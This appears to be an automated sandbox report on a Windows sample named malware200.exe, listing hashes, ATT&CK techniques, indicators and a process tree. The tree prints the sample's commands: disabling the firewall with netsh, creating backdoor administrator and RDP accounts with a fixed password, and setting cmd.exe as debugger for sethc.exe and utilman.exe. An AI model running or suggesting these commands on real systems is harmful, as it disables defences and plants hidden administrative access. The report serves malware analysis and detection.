ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd

Resubmissions

31-08-2023 12:31

230831-pp5gasef7w 9

31-08-2023 12:09

230831-pbznwsfa54 10

Analysis

max time kernel
669s
max time network
791s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
31-08-2023 12:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware200.exe
Size

448KB
MD5

957302c7e0c9e025397c2e3cfdc0fef3
SHA1

10ac72a20ac5cd28c94199899fe2eae6ed5b3a84
SHA256

ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd
SHA512

e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc
SSDEEP

12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4

Score

10^/10

evasion persistence

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	888	1728	netsh.exe	89

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NOTEPAD.EXE

Modifies Windows Firewall 1 TTPs 18 IoCs

evasion

Windows Service

T1543.003

pid	Process
888	netsh.exe
1860	netsh.exe
1752	netsh.exe
2148	netsh.exe
2384	netsh.exe
2792	netsh.exe
1052	netsh.exe
2424	netsh.exe
2780	netsh.exe
1700	netsh.exe
1860	netsh.exe
1344	netsh.exe
1152	netsh.exe
764	netsh.exe
2232	netsh.exe
2656	netsh.exe
2292	netsh.exe
2560	netsh.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	malware200.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\cmd.exe"	malware200.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	malware200.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\cmd.exe"	malware200.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinRAR.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinRAR.exe"	malware200.exe

Modifies WinLogon 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist	malware200.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts	malware200.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist	malware200.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\AstNet = "0"	malware200.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\server_sys = "0"	malware200.exe

AutoIT Executable 14 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/2592-2-0x00000000009B0000-0x0000000000ABC000-memory.dmp	autoit_exe
behavioral1/memory/2592-3-0x00000000009B0000-0x0000000000ABC000-memory.dmp	autoit_exe
behavioral1/memory/2592-7-0x00000000009B0000-0x0000000000ABC000-memory.dmp	autoit_exe
behavioral1/memory/2592-19-0x00000000009B0000-0x0000000000ABC000-memory.dmp	autoit_exe
behavioral1/memory/2592-20-0x00000000009B0000-0x0000000000ABC000-memory.dmp	autoit_exe
behavioral1/memory/2960-1313-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2960-1314-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2056-1322-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2960-1323-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/1620-1325-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2708-1327-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2056-1329-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/1620-1330-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe
behavioral1/memory/2056-1331-0x0000000000170000-0x000000000027C000-memory.dmp	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1740	2708	WerFault.exe	216
2564	1620	WerFault.exe	232
1940	2960	WerFault.exe	135

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_Classes\Local Settings	rundll32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1492	chrome.exe
1492	chrome.exe
688	chrome.exe
688	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1628	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemProfilePrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeProfSingleProcessPrivilege	2136	WMIC.exe
Token: SeIncBasePriorityPrivilege	2136	WMIC.exe
Token: SeCreatePagefilePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeRemoteShutdownPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: 33	2136	WMIC.exe
Token: 34	2136	WMIC.exe
Token: 35	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemProfilePrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeProfSingleProcessPrivilege	2136	WMIC.exe
Token: SeIncBasePriorityPrivilege	2136	WMIC.exe
Token: SeCreatePagefilePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeRemoteShutdownPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: 33	2136	WMIC.exe
Token: 34	2136	WMIC.exe
Token: 35	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2592	malware200.exe
2592	malware200.exe
2592	malware200.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2592	malware200.exe
2592	malware200.exe
2592	malware200.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
1492	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe
688	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 3028	2592	malware200.exe	28
PID 2592 wrote to memory of 3028	2592	malware200.exe	28
PID 2592 wrote to memory of 3028	2592	malware200.exe	28
PID 2592 wrote to memory of 3028	2592	malware200.exe	28
PID 2592 wrote to memory of 2732	2592	malware200.exe	29
PID 2592 wrote to memory of 2732	2592	malware200.exe	29
PID 2592 wrote to memory of 2732	2592	malware200.exe	29
PID 2592 wrote to memory of 2732	2592	malware200.exe	29
PID 2592 wrote to memory of 1752	2592	malware200.exe	31
PID 2592 wrote to memory of 1752	2592	malware200.exe	31
PID 2592 wrote to memory of 1752	2592	malware200.exe	31
PID 2592 wrote to memory of 1752	2592	malware200.exe	31
PID 2592 wrote to memory of 2992	2592	malware200.exe	33
PID 2592 wrote to memory of 2992	2592	malware200.exe	33
PID 2592 wrote to memory of 2992	2592	malware200.exe	33
PID 2592 wrote to memory of 2992	2592	malware200.exe	33
PID 1752 wrote to memory of 764	1752	cmd.exe	37
PID 1752 wrote to memory of 764	1752	cmd.exe	37
PID 1752 wrote to memory of 764	1752	cmd.exe	37
PID 1752 wrote to memory of 764	1752	cmd.exe	37
PID 3028 wrote to memory of 2792	3028	cmd.exe	36
PID 3028 wrote to memory of 2792	3028	cmd.exe	36
PID 3028 wrote to memory of 2792	3028	cmd.exe	36
PID 3028 wrote to memory of 2792	3028	cmd.exe	36
PID 2732 wrote to memory of 2780	2732	cmd.exe	38
PID 2732 wrote to memory of 2780	2732	cmd.exe	38
PID 2732 wrote to memory of 2780	2732	cmd.exe	38
PID 2732 wrote to memory of 2780	2732	cmd.exe	38
PID 2992 wrote to memory of 2760	2992	net.exe	39
PID 2992 wrote to memory of 2760	2992	net.exe	39
PID 2992 wrote to memory of 2760	2992	net.exe	39
PID 2992 wrote to memory of 2760	2992	net.exe	39
PID 2592 wrote to memory of 2328	2592	malware200.exe	40
PID 2592 wrote to memory of 2328	2592	malware200.exe	40
PID 2592 wrote to memory of 2328	2592	malware200.exe	40
PID 2592 wrote to memory of 2328	2592	malware200.exe	40
PID 2328 wrote to memory of 2820	2328	net.exe	42
PID 2328 wrote to memory of 2820	2328	net.exe	42
PID 2328 wrote to memory of 2820	2328	net.exe	42
PID 2328 wrote to memory of 2820	2328	net.exe	42
PID 2592 wrote to memory of 2888	2592	malware200.exe	43
PID 2592 wrote to memory of 2888	2592	malware200.exe	43
PID 2592 wrote to memory of 2888	2592	malware200.exe	43
PID 2592 wrote to memory of 2888	2592	malware200.exe	43
PID 2888 wrote to memory of 2672	2888	net.exe	45
PID 2888 wrote to memory of 2672	2888	net.exe	45
PID 2888 wrote to memory of 2672	2888	net.exe	45
PID 2888 wrote to memory of 2672	2888	net.exe	45
PID 2592 wrote to memory of 2728	2592	malware200.exe	46
PID 2592 wrote to memory of 2728	2592	malware200.exe	46
PID 2592 wrote to memory of 2728	2592	malware200.exe	46
PID 2592 wrote to memory of 2728	2592	malware200.exe	46
PID 2728 wrote to memory of 2236	2728	net.exe	48
PID 2728 wrote to memory of 2236	2728	net.exe	48
PID 2728 wrote to memory of 2236	2728	net.exe	48
PID 2728 wrote to memory of 2236	2728	net.exe	48
PID 2592 wrote to memory of 2896	2592	malware200.exe	49
PID 2592 wrote to memory of 2896	2592	malware200.exe	49
PID 2592 wrote to memory of 2896	2592	malware200.exe	49
PID 2592 wrote to memory of 2896	2592	malware200.exe	49
PID 2896 wrote to memory of 2240	2896	net.exe	51
PID 2896 wrote to memory of 2240	2896	net.exe	51
PID 2896 wrote to memory of 2240	2896	net.exe	51
PID 2896 wrote to memory of 2240	2896	net.exe	51

C:\Users\Admin\AppData\Local\Temp\malware200.exe
"C:\Users\Admin\AppData\Local\Temp\malware200.exe"
1⤵
- Sets file execution options in registry
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode Disable
    3⤵
    - Modifies Windows Firewall
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:2780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:764
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk /expires:never /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:2760
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators AstNet /add
    3⤵
    PID:2820
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
    3⤵
    PID:2672
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" AstNet /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" AstNet /add
    3⤵
    PID:2236
- C:\Windows\SysWOW64\net.exe
  net user AstNet /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /active:yes
    3⤵
    PID:2240
- C:\Windows\SysWOW64\net.exe
  net user AstNet /expires:never
  2⤵
  PID:268
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /expires:never
    3⤵
    PID:984
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk /expires:never /add
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
    3⤵
    PID:1980
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators server_sys /add
  2⤵
  PID:2940
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators server_sys /add
    3⤵
    PID:1788
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" server_sys /add
  2⤵
  PID:1428
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
    3⤵
    PID:1320
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" server_sys /add
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" server_sys /add
    3⤵
    PID:2980
- C:\Windows\SysWOW64\net.exe
  net user server_sys /active:yes
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /active:yes
    3⤵
    PID:1972
- C:\Windows\SysWOW64\net.exe
  net user server_sys /expires:never
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /expires:never
    3⤵
    PID:2308
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk
  2⤵
  PID:2372
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk
    3⤵
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
    3⤵
    PID:1388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:2292
- - C:\Windows\SysWOW64\net.exe
    net user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
      4⤵
      PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
    3⤵
    PID:1684
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
    3⤵
    PID:1660
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall set opmode Disable
      4⤵
      Modifies Windows Firewall
      PID:1860

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1556

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x5b4
1⤵
PID:2912

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:1628
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  PID:268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5669758,0x7fef5669768,0x7fef5669778
  2⤵
  PID:564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:2
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:8
  2⤵
  PID:2692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:8
  2⤵
  PID:2312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:2
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3280 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:2
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1384 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:1
  2⤵
  PID:1052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3484 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3592 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:8
  2⤵
  PID:1772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1288,i,4781384146411169780,10873469492326642455,131072 /prefetch:8
  2⤵
  PID:2192

